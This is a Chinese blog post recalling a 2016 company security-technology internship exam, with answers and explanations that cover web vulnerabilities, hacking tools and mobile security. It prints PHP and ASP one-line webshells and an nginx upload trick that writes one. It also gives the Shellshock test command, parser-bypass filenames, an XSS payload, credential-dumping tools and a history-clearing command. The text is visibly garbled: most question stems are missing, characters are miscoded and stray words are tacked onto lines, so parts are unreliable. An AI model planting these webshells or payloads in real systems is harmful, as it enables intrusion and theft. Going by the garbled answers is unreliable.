鉴于曾经作过某厂招聘-安全技术笔试题目,故留此一记,以做怀念。php
此外,网上也有公布的相关的答案,可是其中有些题目稍有错误或者解释不全,固然我也有可能解释有误,但愿你们多多在评论区中指出,因此趁机写上一记。css
2016年4月2日晚上7:00到9:00,某厂2016实习招聘-安全技术的笔试题确实考到不少基础知识。该笔试题有两部分。第一部分是30道不定项选择题、10道简答题和5道判断题,题量是45,限时80分钟。第二部分是2道分析题,限时40分钟。有下面统一给出答案和为每一题作出解释。html
A 在程序代码中打印日志输出敏感信息方便调式前端
B 在使用数组前判断是否越界mysql
C 在生成随机数前使用当前时间设置随机数种子linux
D 设置配置文件权限为rw-rw-rw-android
答案:ADnginx
解释:web
A 为日志包含敏感信息,容易泄露帐号密码接口数据等信息,可能产生安全漏洞。算法
B 为数组大小问题,数组不越界,可防止溢出安全漏洞。所以是安全的。
C 用当前时间来做为随机数种子的话,随着时间的不一样,生成的随机数也会不一样。所以是安全的。
D 为配置文件的权限问题,rw为能够读取能够写入。第一个rw-为文件所属用户、第二个rw-为用户所在组、第三个rw-为其它用户的读写。能够致使非法写入和越权访问,可能产生安全漏洞。
A Burpsuite
B Hackbar
C Fiddler
D Nmap
答案:AC
解释:
A Burpsuite是能够经过设置浏览器代理进行网络渗透的,用于攻击Web应用的集成平台。能够进行拦截和修改HTTP数据包。
B Hackbar 是用来进行sql注入、测试XSS和加解密字符串的。能够用来快速构建一个HTTP请求(GET/POST)等。可是不能拦截和修改HTTP数据包。
C Fiddler是一个http协议调试代理工具,它可以记录并检查全部你的电脑和互联网之间的http通信。能够进行拦截和修改HTTP数据包。
D Nmap是一款网络端口扫描工具,能够扫描各类端口及其服务甚至是漏洞检测。可是不能不能拦截和修改HTTP数据包。
A 偷取Q 币
B 控制用户摄像头
C 劫持微信用户
D 进入QQ空间
答案:D
解释:
XSS漏洞是获取用户cookie的,便是得到用户cookie等敏感信息。
A 偷取Q币。须要用户进行确认或者输入密码,具备很强的交互性。所以没法进行。
B 控制用户用户摄像头。由于开启摄像头,须要用户手动确认。所以没法进行。
C 劫持微信用户。由于微信登陆会验证手机信息甚至短信验证,而且只能同时在一个设备上登陆一个微信帐号。所以没法进行。
D 进入QQ空间。 由于登陆QQ空间是不须要用户交互操做的,而且使用cookie得到用户身份后,就好像正经常使用户同样能够查看QQ空间,QQ资料等。
A Burpsuite
B Wireshark
C Fiddler
D Nmap
答案:ABC
解释:
A Burpsuite是能够经过设置浏览器代理进行网络渗透的,用于攻击Web应用的集成平台。所以是能够HTTP数据包。
B Wireshark是监听网络接口数据的,能够设置监听某个网卡来监听各类网络数据包。所以是能够抓取HTTP数据包。
C Fiddler是一个http协议调试代理工具,它可以记录并检查全部你的电脑和互联网之间的http通信。所以是能够抓取HTTP数据包。
D Nmap是一款网络端口扫描工具,能够扫描各类端口及其服务甚至是漏洞检测。可是不能抓取HTTP数据包。
A IOS系统从IOS6开始引入kernelASLR安全措施
B 主流的Iphone手机内置了AES及RSA硬件加速解密引擎
C 安卓系统采用了安全引导链(secureboot chain ),而IOS系统则未采用
D Android 4.1 系统默认启用了内存ASLR
答案:ABD
解释:
A IOS系统从IOS6开始引入kernelASLR安全措施。状况属实。所以是正确的。
B 主流的Iphone手机内置了AES及RSA硬件加速解密引擎。状况属实。所以是正确的。
C 安卓系统采用了安全引导链(secureboot chain ),而IOS系统则未采用。状况不属实,缘由是IOS系统也采用了安全引导链。所以是不正确的。
D Android 4.1 系统默认启用了内存ASLR。状况属实。所以是正确的。
A
< ?php assert ($_POST(value));?>
B
<%execute(request("value"))%>
C
<?php @eval ($_POST(value)):?>
D
<%if(request.getParameter("!")!=null)(newjavio.FileOutputStream(application.getRealPath("\\") + request.getParmeter("!"))).write (request.getParameter("t").getByte())):%>
答案:ABCD
解释:
A assert用来判断一个表达式是否成立,能够远程链接。可为PHP一句话木马。
B execute 用来执行表达式,能够执行某些操做。可为asp一句话木马。
C eval 实现php对表达式的计算和执行,能够用来执行某些操做。可为PHP一句话木马。
D 经过判断执行文件输出写入,故为一句话木马。
A xcodeghost 是一种能够直接远程控制手机控制权的攻击方式
B wormhole是一种能够直接远程控制手机控制权的攻击方式
C ” 心脏滴血“ 是一种能够直接远程控制手机控制权的攻击方式
D shellshock是一种能够直接远程控制手机控制权的攻击方式
答案:A
解释:
A 经过Xcode从源头注入病毒XcodeGhost,是一种针对苹果应用开发工具Xcode的病毒。于2015年9月被发现。它的初始传播途径主要是经过非官方下载的Xcode 传播,经过CoreService 库文件进行感染。当应用开发者使用带毒的Xcode工做时,编译出的App 都将被注入病毒代码,从而产生众多带毒APP。用户在iOS设备上安装了被感染的APP后,设备在接入互联网时APP会回连恶意URL地址init.icloud-analysis.com,并向该URL上传敏感信息(如设备型号、iOS 版本)。回连的C&C服务器会根据获取到的设备信息下发控制指令,从而彻底控制设备,能够在受控设备上执行打开网页、发送短信、拨打电话、打开设备上所安装的其余APP等操做。
所以xcodeghost是一种能够直接远程控制手机控制权的攻击方式。
B 百度SDK虫洞漏洞相关的核心代码存在于SDK的com.baidu.hello.moplus中,全部使用该SDK开发的APP,均会开放40310端口响应数据请求。虽然请求限制在本地进行,但攻击者仍然很容易绕过,这可能致使用户数据的大量泄漏。百度旗下应用安装到手机上以后,它会打开40310/6259端口,任何IP均可以链接该端口。被百度称为immortalservice的HTTP服务监视来自该端口的信息,之因此被称为immortal(不朽),缘由是它“会在后台一直运行,而且若是你手机中装了多个有wormhole漏洞的app,这些app会时刻检查40310/6259端口,若是那个监听40310/6259端口的app被卸载了,另外一个app会 立马启动服务从新监听40310/6259端口。 ”链接端口的IP须要验证一些头文件,但很容易经过假装绕过。成功与该服务进行通信后,就能够经过URL给APP下达指令,攻击者能够从用户设备远程获取位置信息,搜索框信息,包信息和其它敏感数据。它能够在用户设备上远程添加联系人,扫描下载文件,上传特定文件。全部这些行为只需简单的经过发送HTTP请求即可以完成。由于在本地HTTP服务(由Moplus SDK创建的)中没有进行身份认证,使得攻击行为不只能够经过app开发者,也能够由任何其它人来触发。只需一个命令,攻击者或者网络罪犯就能够远程控制感染的设备。此外,他们只须要使用nmap进行全网段扫描,测试TCP端口6259或40310的状态,端口状态为OPEN的全部Android设备均可能被远程控制。须要注意的是在同一个局域网内,以及在同一个的3G/ 4G网络的全部设备均可以被攻击。
所以wormhole是一种能够直接远程控制手机控制权的攻击方式。
C Heartbleed漏洞,这项严重缺陷(CVE-2014-0160)的产生是因为未能在memcpy()调用受害用户输入内容做为长度参数以前正确进行边界检查。攻击者能够追踪OpenSSL所分配的64KB缓存、将超出必要范围的字节信息复制到缓存当中再返回缓存内容,这样一来受害者的内存内容就会以每次64KB的速度进行泄露。经过读取网络服务器内存,攻击者能够访问敏感数据,从而危及服务器及用户的安全。敏感的安全数据,如服务器的专用主密钥,可以使攻击者在服务器和客户端未使用彻底正向保密时,经过被动中间人攻击解密当前的或已存储的传输数据,或在通讯方使用彻底正向保密的状况下,发动主动中间人攻击。攻击者没法控制服务器返回的数据,由于服务器会响应随机的内存块。[8]
漏洞还可能暴露其余用户的敏感请求和响应,包括用户任何形式的POST请求数据,会话cookie和密码,这能使攻击者能够劫持其余用户的服务身份。在其披露时,约有17%或五十万经过认证机构认证的互联网安全网络服务器被认为容易受到攻击。电子前哨基金会,ArsTechnica,和布鲁斯·施奈尔都认为心脏出血漏洞是“灾难性的”。[8]
漏洞让特定版本的openSSL成为无需钥匙便可开启的“废锁”,入侵者每次能够翻检户主的64K信息,只要有足够的耐心和时间,就能够翻检足够多的数据,拼凑出户主的银行密码、私信等敏感数据。对此安全专家提醒,网友在网站完成修复升级后,仍需及时修改原来的密码。
所以 ” 心脏滴血“ 不是一种能够直接远程控制手机控制权的攻击方式,而是一种窃取用户信息的攻击方式。
D Shellshock,又称Bashdoor,是在Unix中普遍使用的Bash shell中的一个安全漏洞,首次于2014年9月24日公开。许多互联网守护进程,如网页服务器,使用bash来处理某些命令,从而容许攻击者在易受攻击的Bash版本上执行任意代码。这可以使攻击者在未受权的状况下访问计算机系统。执行命令envx=’() { :;}; echo Shellshock’ bash -c “exit”若是有输出,就说明存在该漏洞。只要是能经过某种手段为bash传递环境变量的程序都受此影响。固然最典型的的就是bash写的CGI程序了,客户端经过在请求字符串里加入构造的值,就能够轻松攻击运行CGI的服务器。
所以shellshockbu不是一种能够直接远程控制手机控制权的攻击方式,而是能够直接远程控制服务器控制权的攻击方式。
root@kali:~/Desktop# whoami
root
root@kali:~/Desktop# function whoami() { echo 1;}
root@kali:~/Desktop# whoami
最后一次执行的whoami 的结果是什么?()
A root
B 1
C echo 1
D echo 1;
答案:B
解释:第一次执行whoami 是正常显示 root.。functionwhoami() { echo 1;} 经过定义函数whoami , 使得whoami 是一个函数,而初始化值为echo 1 ,而echo 1 的执行结果是1。也就是说,经过调用函数whoami 而且初始化(执行echo函数),因此输出结果为1。
A 菜刀
B WSI
C Dosend
D Chkrootkit
答案:C
解释:
A 中国菜刀是一款专业的网站管理软件。
B WSI是PHP注入工具。
C Dosend是一款linux发包攻击工具,可用来实现DDOS攻击。
参考连接为 http://download.csdn.net/detail/linghuncangsang/6664547
D chkrootkit是用来检测rootkit的。
A Apache
B IIS
C nginx
D squid
答案:ABC
A Apache解析漏洞。它 是从右到左开始判断解析,若是为不可识别解析,就再往左判断.
好比upupimage.php.owf.rar “.owf”和”.rar”?这两种后缀是apache不可识别解析,apache就会把upupimage.php.owf.rar解析成php.
B IIS 解析漏洞。一是IIS5.x/6.0中的/xx.asp/xx.jpg ,网站下创建文件夹的名字为.asp、.asa 的文件夹,其目录内的任何扩展名的文件都被IIS看成asp文件来解析并执行。
二 是123.asp;.jpg会被服务器当作是123.asp,IIS6.0 默认的可执行文件除了asp还包含这三种/upupimage.asa/upupimage.cer /upupimage.cdx
C nginx解析漏洞。一是nginx默认Fast-CGI开启情况下,黑阔上传一个名字为upupimage.jpg,内容为<?PHPfputs(fopen(‘shell.php’,'w’),’<?php eval($_POST[cmd])?>’);?>的文件,而后访问upupimage.jpg/.php,在这个目录下就会生成一句话木马 shell.php。
二是Nginx在图片中嵌入PHP代码而后经过访问xxx.jpg%00.php来执行其中的代码,影响版:0.5.,0.6.,0.7 <= 0.7.65, 0.8 <= 0.8.37
D Squid爆出来的更可能是拒绝服务攻击。它是一个高效的Web缓存及代理程序,最初是为Unix平台开发的,如今也被移植到Linux和大多数的Unix类系统中,最新的Squid能够运行在Windows平台下。
A traceroute
B ping
C dig
D who
答案:C
解释:
A traceroute 。该命令为追踪路由状况。
B ping 。该命令为检测网络是否通畅。
C dig 。linux下查询域名解析有两种选择,nslookup或者dig,如 digwww.csdn.net
D who 。该命令为查询登陆linux系统的用户数目。
A mv -100 log
B grep -100 log
C cat -100 log
D tail -100 log
答案:D
解释:
A mv -100 log 。该为mv命令,是移动文件或者文件夹的,与查看日志无关。
B grep -100 log 。该为grep命令,是筛选或者匹配关键词的,与查看日志无关,可是能够配合其余命令进行查看日志。
C cat -100 log 。该命令为顺序查看命令,查看log的前一百行数据(包括空行)。
D tail -100 log。 该命令为倒序查看名,查询log文件的最后100行数据。故选择D
A POST方式提交数据
B BASE64编码和解码
C 代理修改WEB页面的内容
D修改浏览器访问referer
答案:ABD
解释:
A POST方式提交数据。经过在hackbar勾选”Enablepost data”,hackbar能够显出示该功能。
B BASE64编码和解码。经过在hackbarc菜单栏”Encoding”,hackbar能够显出示该功能。
C 代理修改WEB页面的内容。该功能属于插件firebug的。hackbar 无该项功能。
D修改浏览器访问referer。经过在hackbar勾选”EnableReferer “,hackbar能够显出示该功能。
A Metasploit
B Hackbar
C Sqlmap
D Burpsuite
答案:D
解释:
A Metasploit 。 它为集成的漏洞攻击平台,具备多种攻击载荷和shell。可是没法提供拦截和修改http数据包。
B Hackbar 是用来进行sql注入、测试XSS和加解密字符串的。能够用来快速构建一个HTTP请求(GET/POST)等。可是不能拦截和修改HTTP数据包。
C Sqlmap 是用来进行sql注入,获取数据库信息和获操做系统信息,甚至注入后门webshell的,可是不能拦截和修改HTTP数据包。
D Burpsuite是能够经过设置浏览器代理进行网络渗透的,用于攻击Web应用的集成平台。能够进行拦截和修改HTTP数据包。
A hackbar
B AWVS
C IBM appscan
D Nmap
答案:BC
解释:
A hackbar 是用来进行sql注入、测试XSS和加解密字符串的。能够用来快速构建一个HTTP请求(GET/POST)等。可是不能自动化web 漏洞扫描
B AWVS 是业界很是推荐的漏洞扫描神器,它拥有数目很是多并且最强大的漏洞检测脚本,国内多数人使用破解版,它能够进行自动化web漏洞扫描。
C IBM appscan 是国外IBM安全公司的一款很是厉害的安全漏洞扫描产品,可以扫描各类生产环境的WEB,也就是说它也能够进行自动化web 漏洞扫描。
D Nmap是一款网络端口扫描工具,能够扫描各类端口及其服务甚至是系统漏洞检测,从它的NSE脚本能够看到它也能够进行WEB漏洞扫描,可是须要复杂的配置命令,故它不能进行自动化web漏洞扫描。
答案:BC
C:\Users\test>ping www.baidu.com -n 1
正在 Pingwww.a.shifen.com [14.215.177.38] 具备32字节的数据:
请求超时
C:\Users\test>telnet www.baidu.com 80
正在连接www.baidu.com...没法打开到主机的链接。
A windows/meterpreter/reverse_http
B icmp协议的后门
C windows/meterpreter/reverse_https
D windows/meterpreter/reverse_tcp
答案: ABC
解释:IE浏览器使用了代理,可能HTTP协议会受到防火墙限制。ping不通百度说明ICMP协议也受影响。故http、https、icmp协议的反弹shell都会失败
A 部分Android 产品 也受到了影响
B 应用程序开发使用了包含后门插件的IDE
C 当手机被盗时才有风险
D苹果官方回应APPSTORE上的应用程序不受影响
答案:B
解释:经过Xcode从源头注入病毒XcodeGhost,是一种针对苹果应用开发工具Xcode的病毒。于2015年9月被发现。它的初始传播途径主要是经过非官方下载的Xcode 传播,经过CoreService 库文件进行感染。当应用开发者使用带毒的Xcode工做时,编译出的App 都将被注入病毒代码,从而产生众多带毒APP。用户在iOS设备上安装了被感染的APP后,设备在接入互联网时APP会回连恶意URL地址init.icloud-analysis.com,并向该URL上传敏感信息(如设备型号、iOS 版本)。回连的C&C服务器会根据获取到的设备信息下发控制指令,从而彻底控制设备,能够在受控设备上执行打开网页、发送短信、拨打电话、打开设备上所安装的其余APP等操做。苹果官方当时下架相关的应用。
故XcodeGhost,是一种针对苹果应用开发工具的病毒,它是应用程序开发使用了包含后门插件的IDE,手机下了含有XCODE病毒的应用就会受到影响,苹果官方回应,APPSTORE上的应用程序是受到影响,而且下架了一部分受影响的应用。
A 没有对SSL证书校验
B 没有对主机名进行校验
C SSL证书被泄露
D 使用WIFI链接网络
答案: ABC
解释:
Android 应用中致使HTTPS漏洞的分析:
1)中间人攻击漏洞位置:
X509TrustManager 、HostnameVerifier、setHostnameVerifier (X509HostnameVerifier hostnameVerifier)
2) 漏洞触发前提条件:
自定义的X509TrustManager不校验证书;
或实现的自定义HostnameVerifier不校验域名接受任意域名;
或使用setHostnameVerifier(ALLOW_ALL_HOSTNAME_VERIFIER);
3) 漏洞原理:
因为客户端没有校验服务端的证书,所以攻击者就能与通信的两端分别建立独立的联系,并交换其所收到的数据,使通信的两端认为他们正在经过一个私密的链接与对方直接对话,但事实上整个会话都被攻击者彻底控制。在中间人攻击中,攻击者能够拦截通信双方的通话并插入新的内容。
客户端不校验SSL证书(包含签名CA是否合法、域名是否匹配、是否自签名证书、证书是否过时)包含如下几种编码错误状况:
a. 自实现的不校验证书的X509TrustManager接口的Java代码片断 (其中的checkServerTrusted()方法实现为空,即不检查服务器是否可信):
b. 不检查站点域名与站点证书的域名是否匹配的Java代码片断:
c. 接受任意域名的Java代码片断:
A 没有对SSL证书校验 —–》》》客户端自定义的X509TrustManager不校验证书;,攻击者冒用证书
B 没有对主机名进行校验—-》》》客户端实现的自定义HostnameVerifier不校验域名接受任意域名,攻击者可使用域名冒用
C SSL证书被泄露—-》》》》 证书颁发机构(Certification Authority)被攻击致使私钥泄露等。攻击者可经过中间人攻击,盗取帐户密码明文、聊天内容、通信地址、电话号码以及信用卡支付信息等敏感信息,甚至经过中间人劫持将原有信息替换成恶意连接或恶意代码程序,以达到远程控制、恶意扣费等攻击意图。
D 使用WIFI链接网络—-《《《客户端使用WIFI链接对于HTTPS传输来讲,不会受到影响。由于重点是中间人漏洞攻击的位置和触发条件不会受到网络类型的影响。
加密前:
0000000000000000
0000000000000000
0000000000000000
000000000000000
加密后:
fbcd723ec4f10af24a9472349f722954
fbcd723ec4f10af24a9472349f722954
fbcd723ec4f10af24a9472349f722954
13d7ffbfe87a41c1fef1f429af20babc
答案:A
解释:选项从缺,有知道此题的小伙伴能够留言帮咱们补上…
$username = $_GET(username);
echo $uername
mysql_query("select * from orders where username = "$username"or dir (mysql_error():
?>
A 命令执行漏洞
B SQL注入漏洞
C 文件包含漏洞
D 反射XSS漏洞
答案:ABD
解释:
A 命令执行漏洞—>>>>
$username = $_GET(username);echo $username
参数不过滤,能够将username设置某个命令。
B SQL注入漏洞—>>>>
mysql_query("select* from orders where username = "$username"or dir (mysql_error():
参数不过滤,能够将username设置某个带截断的查询语句。
C 文件包含漏洞—>>>>该代码中不涉及文件操做。
D 反射XSS漏洞—->>>参数过滤不严格,能够输入
username=<script>alert(1)</script>
A 检测HTTPreferer 字段同域
B 限制sessioncookie的生命周期
C 使用验证码
D cookie关键字段设置HttpOnly属性
答案:ABCD
解释:
CSRF漏洞防护主要能够从三个层面进行,即服务端的防护、用户端的防护和安全设备的防护。
A 检测HTTPreferer 字段同域—》》》》根据HTTP协议,在HTTP头中有一个字段叫Referer,它记录了该HTTP请求的来源地址。在一般状况下,访问一个安全受限页面的请求必须来自于同一个网站。好比某银行的转帐是经过用户访问http://bank.test/test?page=10&userID=101&money=10000页面完成,用户必须先登陆bank.test,而后经过点击页面上的按钮来触发转帐事件。当用户提交请求时,该转帐请求的Referer值就会是转帐按钮所在页面的URL(本例中,一般是以bank. test域名开头的地址)。而若是攻击者要对银行网站实施CSRF攻击,他只能在本身的网站构造请求,当用户经过攻击者的网站发送请求到银行时,该请求的Referer是指向攻击者的网站。所以,要防护CSRF攻击,银行网站只须要对于每个转帐请求验证其Referer值,若是是以bank. test开头的域名,则说明该请求是来自银行网站本身的请求,是合法的。若是Referer是其余网站的话,就有多是CSRF攻击,则拒绝该请求
B 限制sessioncookie的生命周期—》》》CSRF攻击是有条件的,当用户访问恶意连接时,认证的cookie仍然有效,因此当用户关闭页面时要及时清除认证cookie
C 使用验证码—》》》虽然攻击者已经经过获取cookie获得用户的身份,可是经过在你的表单中包括验证码,事实上网站已经消除了跨站请求伪造攻击的风险。能够在任何须要执行操做的任何表单中使用这个流程。
D cookie关键字段设置HttpOnly属性—–》》》》能够在必定程度防护CSRF。
A android:allowbackup=“ true “
B Android:name = ” con.trsc”
C Android: debug = ” true “
D Androidtarget sdkversion = “17″
答案:ABC
解释:
A android:allowbackup=“ true “—-》》》》容许app备份,能够致使其余app非法访问这些数据
B Android:name = ” con.trsc”—》》》》没有设置成私有,能够致使非法越权访问
C Android: debug = ” true “—》》》经过调式,能够调用查看其余文件
D Androidtarget sdkversion = “17″—-》》》》sdk版本信息
A WCE
B minikatz
C Quarks PWdump
D CAIN
答案:AB
A WCE是与gethashes 和mimikatz齐名的一款hash管理工具,使用wce进行本地和域的hash注入 ,能够在高权限下获取明文密码
B 法国一个牛B的人写的轻量级调试器,能够帮助安全测试人员抓取Windows密码。mimikatz 2.0版本,抓密码命令更加简单了,新功能还包括可以经过获取的kerberos登陆凭据,绕过支持RestrictedAdmin模式的win8或win2012svr的远程终端(RDP) 的登录认证
C Quarks PwDumpQuarks PwDump 是一个Win32环境下的系统受权信息导出工具,目前除此以外没有任何一款工具能够导出如此全面的信息,支持这么多的OS版本,且至关稳定。它目前能够导出 :- Local accounts NT/LM hashes + history 本机NT/LM哈希+历史登陆记录 – Domain accounts NT/LM hashes + history 域中的NT/LM哈希+历史登陆记录 – Cached domain password 缓存中的域管理密码 – Bitlocker recovery information (recovery passwords & key packages) 使用Bitlocker的恢复后遗留的信息支持的操做系统 : XP/2003/Vista/7/2008/81 / USAGE
D CAIN主要用于网络数据嗅探,也带有密码破解功能,可是不能抓取windows明文密码
A 获取网站用户注册的我的资料信息
B 修改网站用户注册的我的资料信息
C 冒用网站用户的身份发布信息
D 以上均可以
答案:D
解释:CSRF成功后,攻击者能够获取到用户身份,因此攻击者能够获取用户的我的资料,甚至是冒用网站用户发布信息。可是一个网站存在CSRF,这个说法多是某处存在该漏洞或者整个网站都存在。至于在修改或者冒用用户发布信息,这个要依据整个网站的安全架构来讲,若是一个网站设置了修改用户我的资料和发布信息都须要验证码或者须要我的手机短信的再次验证,这个就难说了。固然这里咱们从最简单的角度考虑,A、B、C都在小网站均可以实现。
A cc攻击须要借助代理进行
B cc攻击利用的时tcp协议的缺陷
C cc攻击难以获取目标机器的控制权
D cc攻击最先在国外大面积流行
答案: ACD
解释:攻击者借助代理服务器生成指向受害主机的合法请求,能够经过TCP/IP进行,本质是模拟多个用户不停访问页面,致使该页面的服务没法处理过多请求,从而致使服务器宕机或者拒绝服务。
A 在程序代码中插入Log()方法输出敏感信息方便调试
B 在应用正式版Andoridmanifest.xml中设置android:debuggable=”false”
C 使用SecureRandom时使用安全的方法设置seed
D 设置应用配置文件为任意用户可读写
答案:AD
解释:
A 在程序代码中插入Log()方法输出敏感信息方便调试—–》》》》该方式能够在日志中泄露登陆的密码,可致使安全漏洞。
B 在应用正式版Andoridmanifest.xml中设置android:debuggable=”false”—-》》》》》》这个能够防止不法分子对应用进行调式,有必定的安全效果。固然经过JD或者JEB逆向后,将” false“ 改为 ” true“ 的状况,另当别说。
C 使用SecureRandom时使用安全的方法设置seed—-》》》》》这个能够产生安全的随机数。
D 设置应用配置文件为任意用户可读写—-》》》》》这个会致使非法用户越权访问敏感信息,可致使安全漏洞。
A Xposed
B Intent Fuzz
C Drozer
D Substrate
答案:D
解释:
A Xposed—-》》》这个是android的hook框架,有很多开发者发布了不错的框架。
B Intent Fuzz—》》》这个是android 应用组件模糊测试框架,
C Drozer—-》》这个是android 综合渗透测试平台。
D Substrate—》》》这个是IOS平台的hook的框架,而Cydia Substrate是android上的强大而实用的HOOK工具。
A mysql_real_escape_string
B escapeshellarg
C htmlentities
D addslashes
答案: AD
解释:
A mysql_real_escape_string–>>>> 该函数经过转义字符串,实现了过滤无效化(消毒)的功能,能够避免sql注入。
B escapeshellarg–>>>> escapeshellarg — 把字符串转码为能够在 shell 命令里使用的参数,固然这个是转义shell注入的,和sql注入没有太多联系,和命令执行有关。
C htmlentities—>>>>>>>该函数是字符转换为 HTML 实体,没有避免sqlz注入的功能
D addslashes—>>>addslashes — 使用反斜线引用字符串,返回字符串,该字符串为了数据库查询语句等的须要在某些字符前加上了反斜线。这些字符是单引号(’)、双引号(”)、反斜线(\)与 NUL(NULL 字符)。实际就是转义。
A 21
B 3389
C 8080
D 1024
答案: AC
解释:nmap 的默认扫描选项是对常规端口和服务进行探测,常规端口是1000个最可能开发的端口
A XSS
B CSRF
C 越权
D 以上都不能够
答案 ABC
解释:
A XSS—>>>获取管理员的session,从而得到大量注册用户身份信息。
B CSRF—>>>获取管理员的cookie,从而得到大量注册用户身份信息。
C 越权–>>> 越权访问其余用户信息。
故以上三个都可以。
答案:sleep()
答案:/var/log/wtmp
答案:
~/.bash_history
history -c
答案: Xcon
答案:
wormhole 是百度SDK的部分更新模块登录验证不够严格,存在被第三方利用的风险。若是你手机中装了多个有wormhole漏洞的app,这些app会时刻检查40310/6259端口,若是那个监听40310/6259端口的app被卸载了,另外一个app会 立马启动服务从新监听40310/6259端口。 ”链接端口的IP须要验证一些头文件,但很容易经过假装绕过。成功与该服务进行通信后,就能够经过URL给APP下达指令,好比获取用户手机的GPS位 置,给手机增长联系人,下载任意文件到指定路径若是文件是apk则进行安装。
答案:缓冲区溢出
答案:net user
答案:404
答案:同源策略
答案:5
答案:对
解释:zmap 的单次执行能够同时扫描多个端口,这也是它号称比nmap 快的缘由之一。
答案:错
解释:TCP只是传输可靠,UDP只是最大地交付。严格来讲,二者不存在哪一个是否更安全的对比。
答案:
IPC localhost 10.1.1.10: 135 ESTABLISH
解释:这个用法比较少见。net use h: \\ip\c$ “密码” /user:”用户名” 直接登录后映射对方C:到本地为H:本质是ipct通道的用法
答案:错
解释:Redis 默认状况下,会绑定在0.0.0.0:6379,这样将会将Redis服务暴露到公网上,若是在没有开启认证的状况下,能够致使任意用户在能够访问目标服务器的状况下未受权访问Redis以及读取Redis的数据。攻击者在未受权访问Redis的状况下能够利用Redis的相关方法,能够成功将本身的公钥写入目标服务器的/root/.ssh 文件夹的authotrized_keys文件中,进而能够直接登陆目标服务器。
答案:对
解释:常见的非对称加密算法有;RSA、Diffie-Hellman(DH) 、椭圆曲线算法(ECC). 其中使用最普遍的是RSA算法。常见的对称加密算法有:DES算法,3DES算法,TDEA算法,Blowfish算法,RC5算法,IDEA算法。
参考设计:
1 首先在用户输入密码时,加上比较复杂的验证码,同时以时间戳加密生成随机数,加上csrf_token等
2 而后再把用户帐号密码经过前端加密传输到服务器后台,而且设置同源策略,
3 服务器验证客户端的身份后,经过随机安全数加密session和cookie返回给客户端。
4 客户端与服务器创建链接。
参考回答:
1 首先检查服务器上该webshell 存放路径,分析该webshell的行为。
2 清除webshell及其余后门,而后根据webshell入侵的方式,进行修补漏洞,升级程序。
3 对服务器进行安全加固,对服务器上的系统和web服务进行安全设置。
4 综合上述,攥写安全报告(例如首先肯定是什么漏洞和服务器上的运维设置致使黑客能够成功上传webshell,如新出现的0day 或者服务器web 的运维配置不当或者弱口令;而后分析了清除了哪些后门,这些后门对服务器形成了哪些影响-盗用了数据库、或者安装了新后门进行DDOS或者其余方面。接着写为避免了这些漏洞,我作了哪些安全加固–修改web服务器配置,对系统进行加固,安装相关的杀毒软件,调整WAF策略等等。最后给出后面按期的安全检查和维护措施。